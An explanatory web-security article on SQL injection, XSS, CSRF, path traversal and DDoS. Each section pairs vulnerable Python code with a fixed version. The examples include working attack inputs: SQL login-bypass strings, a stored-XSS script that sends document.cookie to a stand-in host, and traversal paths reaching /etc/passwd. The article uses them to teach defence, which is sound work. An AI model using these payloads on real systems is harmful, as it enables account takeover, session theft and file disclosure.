Web security issues you need to be concerned

1. SQL Injection (SQLi)

SQL injection is one of the most common web security issues companies face. It is an injection attack in which an attacker supplies input that the application concatenates into a SQL query, so the database executes statements the developer never intended. With it an attacker can read sensitive data such as user and admin credentials or card details, add, modify or delete records, and in many cases bypass application controls such as login checks entirely.

 

SQL injection is one of the oldest and most dangerous attacks; it has been used for years to steal data and, in some cases, to take over or deface entire sites. Injection is a long-standing entry in the OWASP Top 10, and SQL injection is the variant that matters most for any web application backed by a SQL database.

 

How to prevent SQL injection?

The most reliable defence is to use parameterized queries (prepared statements) with bound, typed parameters, so that user input is always passed to the database as data and never concatenated into the SQL string. Stored procedures help only when they are themselves called with parameters and do not build dynamic SQL internally. Every mainstream platform (.NET, PHP, Java, Python and so on) provides a parameterized query API.
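The following is an added example, not code from the original article: a login check written the vulnerable way (string formatting) beside the parameterized version, run against a constructed in-memory SQLite table. The table, user names and passwords are assumptions made for the demonstration.

```python
import sqlite3

# Constructed sample database, not from the article: an in-memory users table.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
        [("alice", "s3cret", "admin"), ("bob", "hunter2", "user")],
    )
    return conn


def login_vulnerable(conn, username, password):
    # String formatting puts attacker-controlled text straight into the SQL grammar:
    # a quote in the input ends the literal and the rest is parsed as SQL.
    sql = (
        "SELECT username, role FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(sql).fetchone()


def login_parameterized(conn, username, password):
    # Placeholders: the driver binds the values; they are never parsed as SQL,
    # so a quote or a comment marker in the input is just part of the string.
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


if __name__ == "__main__":
    conn = make_db()
    # Classic tautology in the password field: WHERE ... AND password = '' OR '1'='1'
    print(login_vulnerable(conn, "alice", "' OR '1'='1"))
    # Comment marker in the username field: the password check is commented out.
    print(login_vulnerable(conn, "alice'--", "wrong"))
    # Same inputs against the parameterized query: no row is returned.
    print(login_parameterized(conn, "alice", "' OR '1'='1"))
    print(login_parameterized(conn, "alice'--", "wrong"))
```

Both payloads log the attacker in as alice through the vulnerable function without the password; the parameterized function treats them as literal (and wrong) credentials. The same pattern applies to any driver that supports placeholders; what differs is only the placeholder syntax (`?`, `%s`, `:name`).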

 

Beyond that, install updates and patches for the database, framework and application as soon as they are released, and run the application's database account with the least privilege it needs, so that a successful injection cannot read or alter more than that one feature requires. A well-tuned web application firewall adds a layer of defence, but it filters known patterns and should not be treated as a substitute for fixing the code.

 

2. Cross-Site Scripting(XSS)

Cross-site scripting is one of the most frequently found vulnerabilities in web applications. XSS lets an attacker inject client-side script into a page, and that script then runs in the browsers of other users who view the page.

 

XSS is usually divided into stored (persistent) and reflected XSS; a third type, DOM-based XSS, arises when the page's own client-side JavaScript writes untrusted data into the document. Stored XSS happens when the payload is saved by the application: for example, an attacker posts a comment containing script, the comment is stored, and the script runs every time any user views that page. This makes stored XSS far more dangerous than reflected XSS. Reflected XSS happens when the payload travels in a URL or POST parameter and is echoed straight back in the response; it is not saved anywhere, so the attacker has to get each victim to open a crafted link or submit a crafted form, which makes it harder to exploit at scale but no less severe for the victim who does.

 

XSS is typically used to steal session cookies, read anti-CSRF tokens, perform actions in the victim's name, or make arbitrary changes to the page's DOM (for example, to inject a fake login form).

 

How to prevent XSS?

The primary defence is output encoding: every piece of user-supplied data must be encoded for the context in which it is written into the page (HTML body, attribute value, JavaScript string, URL) at the moment it is rendered. Input validation is a useful second layer but cannot be relied on alone, because the same string is dangerous in one context and harmless in another. Marking session cookies HttpOnly limits what a successful XSS can steal, and a Content Security Policy restricts which scripts may run at all. A good WAF adds another layer against known payloads.
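As an added example (not code from the original article), here is a comment renderer in its vulnerable form beside a version that HTML-encodes the stored text for both the element body and a quoted attribute. The comments, including the two payloads, are constructed for the demonstration; the `data-raw` attribute is an assumption chosen to show the attribute-breakout case.

```python
import html

# Constructed sample comments, not from the article: one benign comment,
# a stored-XSS payload aimed at the element body, and one aimed at an attribute.
COMMENTS = [
    "Great article!",
    '<script>document.location="https://evil.example/?c="+document.cookie</script>',
    '" onmouseover="alert(1)',
]


def render_comment_unsafe(text):
    # Raw concatenation: the stored payload becomes live markup on every page view.
    # The third payload closes the data-raw attribute and adds an event handler.
    return f'<li class="comment" data-raw="{text}">{text}</li>'


def render_comment_safe(text):
    # Encode for the context the data lands in. html.escape(quote=True) encodes
    # < > & " ' so the text is inert both in the element body and inside a
    # double-quoted attribute value. A JavaScript or URL context would need a
    # different encoder; HTML escaping alone is not enough there.
    enc = html.escape(text, quote=True)
    return f'<li class="comment" data-raw="{enc}">{enc}</li>'


def render_page(comments, renderer):
    # Stored XSS: the same stored strings are rendered for every visitor.
    return "<ul>" + "".join(renderer(c) for c in comments) + "</ul>"


if __name__ == "__main__":
    print(render_page(COMMENTS, render_comment_unsafe))
    print(render_page(COMMENTS, render_comment_safe))
```

In the unsafe output the script tag and the injected `onmouseover` handler are real markup; in the safe output they are visible text. The safe renderer encodes at output time, which is why it protects even when the stored data was never validated on the way in.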


3. Cross-site request forgery(CSRF)

Browsers automatically attach a site's cookies to every request sent to that site, including requests triggered by a page on a completely different site, such as an embedded image, a request issued by JavaScript, or a hidden auto-submitting form. Cross-site request forgery, also called session riding, abuses this: the victim visits an attacker-controlled page while logged in to the target application, and that page makes the victim's browser send a state-changing request (a transfer, a password change, an email change) which the application accepts because the session cookie is valid. Unlike XSS, which exploits the trust a user has in a website, CSRF exploits the trust a web application has in the user's browser.

 

How to prevent CSRF?

An attacker can forge a request because the parameter names and values of the target form are predictable. Adding a parameter whose value the attacker cannot know, and which the server validates on every state-changing request, blocks the attack. In practice this means an anti-CSRF token (a random, per-session or per-request value embedded in the form and checked on submission) together with the SameSite attribute on the session cookie, which tells the browser not to send the cookie with cross-site requests at all. Use both: SameSite is a browser-side control, and older clients may not honour it.
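The following added example (not the article's code) shows both controls together: a per-session anti-CSRF token issued with the form and checked on submission, and a Set-Cookie header that marks the session cookie SameSite. The session store, the `/transfer` endpoint and its field names are assumptions made for the example.

```python
import hmac
import secrets

# Constructed in-memory session store, not from the article: sid -> session data.
SESSIONS = {}


def create_session(user):
    sid = secrets.token_urlsafe(32)
    # One unpredictable anti-CSRF token per session, kept server-side.
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return sid


def session_cookie_header(sid):
    # SameSite=Lax (or Strict) stops the browser attaching this cookie to
    # cross-site POSTs, which defeats the classic hidden-form CSRF on its own.
    return f"Set-Cookie: session={sid}; Path=/; HttpOnly; Secure; SameSite=Lax"


def render_transfer_form(sid):
    # The token travels in the form body, which a cross-site page cannot read.
    token = SESSIONS[sid]["csrf"]
    return (
        '<form method="POST" action="/transfer">'
        f'<input type="hidden" name="csrf_token" value="{token}">'
        '<input name="to"><input name="amount"><button>Send</button></form>'
    )


def handle_transfer(cookies, form):
    """Server side of POST /transfer. Returns (status, message)."""
    session = SESSIONS.get(cookies.get("session"))
    if session is None:
        return 401, "not authenticated"
    submitted = form.get("csrf_token", "")
    # Constant-time comparison so the check does not leak the token byte by byte.
    if not hmac.compare_digest(submitted, session["csrf"]):
        return 403, "missing or invalid CSRF token"
    return 200, f"{session['user']} sent {form['amount']} to {form['to']}"


if __name__ == "__main__":
    sid = create_session("alice")
    print(session_cookie_header(sid))
    # Attacker's hidden form: it knows the parameter names but not the token.
    print(handle_transfer({"session": sid}, {"to": "mallory", "amount": "1000"}))
    # Legitimate submission from the real form.
    token = SESSIONS[sid]["csrf"]
    print(handle_transfer({"session": sid}, {"to": "bob", "amount": "10", "csrf_token": token}))
```

The forged request is rejected with 403 even though the session cookie is valid, because the attacker's page cannot read the token out of the victim's form. If the application also set `SameSite=Lax`, a modern browser would not have sent the session cookie with the cross-site POST in the first place, and the request would have failed at the 401 step.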

 

Cross-site request forgery: OWASP

 

4. Directory traversal

Directory traversal (path traversal) is an attack in which a file path supplied through an HTTP request is manipulated, typically with "../" sequences or their URL-encoded forms, so that the application reads or writes files outside the directory it was meant to serve. It can expose configuration files, credentials and source code, and when the attacker can write files or reach an interpreter it can lead to compromise of the whole web server. The root cause is that user-controlled input is used to build a file path without proper validation.

 

How to prevent directory traversal?

The fix belongs in the application: avoid using user input to build file paths where possible (map an identifier to a server-side path instead), and where a user-supplied name is unavoidable, canonicalize the resulting path and verify that it still lies inside the intended base directory before opening it. Keep the web server and framework patched, since traversal bugs are regularly found in server software itself, and run the process with file-system permissions limited to the directories it genuinely needs. A WAF can block the obvious "../" patterns but is easily bypassed by encoding tricks, so treat it as a supplement.
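As an added example (not the article's code), here is the canonicalize-then-check pattern for a download handler, assuming a document root of /srv/www/files. It decodes the request once, resolves the joined path, and accepts it only if the resolved path is inside the root; the test inputs cover plain and URL-encoded "../", an absolute path, and a sibling directory that a naive string-prefix check would wrongly allow.

```python
import os
from urllib.parse import unquote

# Constructed document root for the example, not from the article.
DOCUMENT_ROOT = "/srv/www/files"


def resolve_download(requested, root=DOCUMENT_ROOT):
    """Return the absolute path to serve, or None if the request escapes root."""
    # Decode once, so %2e%2e%2f is seen as ../ before the check rather than after it.
    name = unquote(requested)
    root_real = os.path.realpath(root)
    # os.path.join discards root entirely when name is absolute, so join is not
    # the safety mechanism; the containment check below is.
    candidate = os.path.realpath(os.path.join(root_real, name))
    # commonpath compares whole path components, so /srv/www/files_backup does
    # not pass as being under /srv/www/files the way a str.startswith check would.
    if os.path.commonpath([root_real, candidate]) != root_real:
        return None
    if candidate == root_real:
        return None  # the root directory itself is not a downloadable file
    return candidate


if __name__ == "__main__":
    for req in ["reports/q1.txt", "../../etc/passwd", "%2e%2e/%2e%2e/etc/passwd",
                "/etc/passwd", "../files_backup/secret", "reports/../q2.txt"]:
        print(f"{req!r:32} -> {resolve_download(req)}")
```

Only `reports/q1.txt` and `reports/../q2.txt` resolve to a path under the root; every other request returns None and should be answered with a 400 or 404 without touching the file system. The check is done on the resolved path, which is what matters: it does not try to enumerate bad patterns in the input.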

 

Path traversal: OWASP

 

5. Distributed Denial of service(DDOS)

To understand distributed denial of service we first need the plain denial-of-service (DoS) attack. In a DoS attack, a large volume of traffic is sent at the target so that its bandwidth, connection table, CPU or memory is exhausted and legitimate users are denied service. Attackers typically flood the target with TCP, UDP or ICMP packets, or with HTTP requests that are cheap to send but expensive for the server to answer.

 

A basic DoS attack uses a single machine and a single internet connection, which is ineffective against a server with far more bandwidth than the attacker. To overwhelm such targets, attackers use many compromised machines (a botnet) to flood the target simultaneously; this is a distributed denial-of-service attack, or DDoS.

 

How to prevent a DDOS attack?

The first step is to detect the attack early: establish what normal traffic looks like for your service (request rate, client mix, geography) and alert when a spike departs from that baseline, so that you can see where the flood is coming from and rate-limit or block the worst sources. Over-provisioning bandwidth absorbs smaller attacks. Large attacks exceed what any single site can absorb, so upstream protection from your ISP or a DDoS mitigation or CDN service that scrubs traffic before it reaches you is the only practical defence at scale.
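The following added example (not the article's code) runs the baseline-and-spike idea over a constructed access log: it learns the normal requests-per-second rate from a warm-up window, flags seconds that exceed a multiple of that rate, and lists the sources that dominate the flagged seconds as rate-limit candidates. The log format, the IP ranges and the thresholds are assumptions made for the demonstration.

```python
from collections import Counter, defaultdict

# Constructed access-log sample, not from the article. Each line is
# "<epoch-second> <client-ip> <method> <path>". Seconds 0-9 carry ordinary
# traffic from many distinct clients; seconds 10-14 add a flood from three sources.
def build_sample_log():
    lines = []
    for sec in range(15):
        for i in range(5):  # 5 ordinary requests per second, each from a different client
            lines.append(f"{sec} 198.51.100.{(sec * 5 + i) % 200 + 1} GET /index.html")
        if sec >= 10:
            for i in range(60):  # 60 extra requests per second from 3 attacking hosts
                lines.append(f"{sec} 203.0.113.{i % 3 + 1} GET /search?q={i}")
    return lines


def per_second_counts(lines):
    """Map each second to a Counter of requests per client IP."""
    counts = defaultdict(Counter)
    for line in lines:
        sec, ip, _ = line.split(" ", 2)
        counts[int(sec)][ip] += 1
    return counts


def baseline_rps(counts, warmup_seconds):
    # Learn "normal" from a window you trust: mean requests/second during warm-up.
    total = sum(sum(c.values()) for s, c in counts.items() if s < warmup_seconds)
    return total / warmup_seconds


def detect_flood(lines, warmup_seconds=10, factor=5.0, top=3):
    """Return (flagged_seconds, suspect_ips).

    flagged_seconds: seconds whose total volume exceeds factor x baseline.
    suspect_ips: the heaviest sources in those seconds, kept only if each one
    alone sends more than the whole normal baseline per flagged second.
    """
    counts = per_second_counts(lines)
    baseline = baseline_rps(counts, warmup_seconds)
    flagged = sorted(s for s, c in counts.items() if sum(c.values()) > factor * baseline)
    suspects = Counter()
    for s in flagged:
        suspects.update(counts[s])
    per_sec = max(len(flagged), 1)
    suspect_ips = [ip for ip, n in suspects.most_common(top) if n / per_sec > baseline]
    return flagged, suspect_ips


if __name__ == "__main__":
    flagged, suspects = detect_flood(build_sample_log())
    print("baseline rps:", baseline_rps(per_second_counts(build_sample_log()), 10))
    print("flagged seconds:", flagged)
    print("rate-limit candidates:", suspects)
```

Against the sample the baseline is 5 requests per second, seconds 10 through 14 run at 65 and are flagged, and the three 203.0.113.x hosts surface as candidates. The per-source step is what helps against a small number of abusive hosts; a genuinely distributed attack spreads the load over thousands of addresses that individually look normal, which is why the volume alarm still fires but the blocking decision has to move upstream to a scrubbing provider.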

 


